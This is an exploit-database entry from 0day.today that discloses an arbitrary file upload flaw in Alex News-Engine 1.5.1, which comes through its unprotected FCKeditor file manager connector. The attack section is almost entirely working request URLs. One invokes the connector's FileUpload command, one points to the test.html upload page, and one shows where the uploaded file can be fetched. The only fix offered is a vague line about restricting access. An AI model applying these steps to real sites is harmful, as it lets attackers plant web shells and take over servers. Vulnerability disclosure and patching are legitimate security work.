[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Alex News-Engine 1.5.1 Remote Arbitrary File Upload Vulnerability

Author
Batter
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-4203
Category
web applications
Date add
19-11-2008
Platform
unsorted
=================================================================
Alex News-Engine 1.5.1 Remote Arbitrary File Upload Vulnerability
=================================================================


########################################################################
#
#                        Yellow Flood Organization
#
# Alex News-engine (fckeditor) Arbitrary File Upload
#
# Source: http://www.alexscriptengine.de/blog/category/news-engine/
#
# Download: http://www.alexscriptengine.de/blog/asedownloads/news-engine/
#
# Discover by: Batter
#
########################################################################



####################
- Vulnerability:
####################

/editors/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php?Command=FileUpload&Type=File&CurrentFolder=/

####################
- Exploit:
####################

http://www.site.com/path/admin/includes/FCKeditor/editor/filemanager/browser/default/connectors/test.html

####################
- how To use:
####################

http://www.site.com/script-folder-name/script-folder-name/images/site_images/uploadet-file.*

####################
- Solution:
####################

Restrict and grant only trusted users access to the resources.



#  0day.today [2024-12-25]  #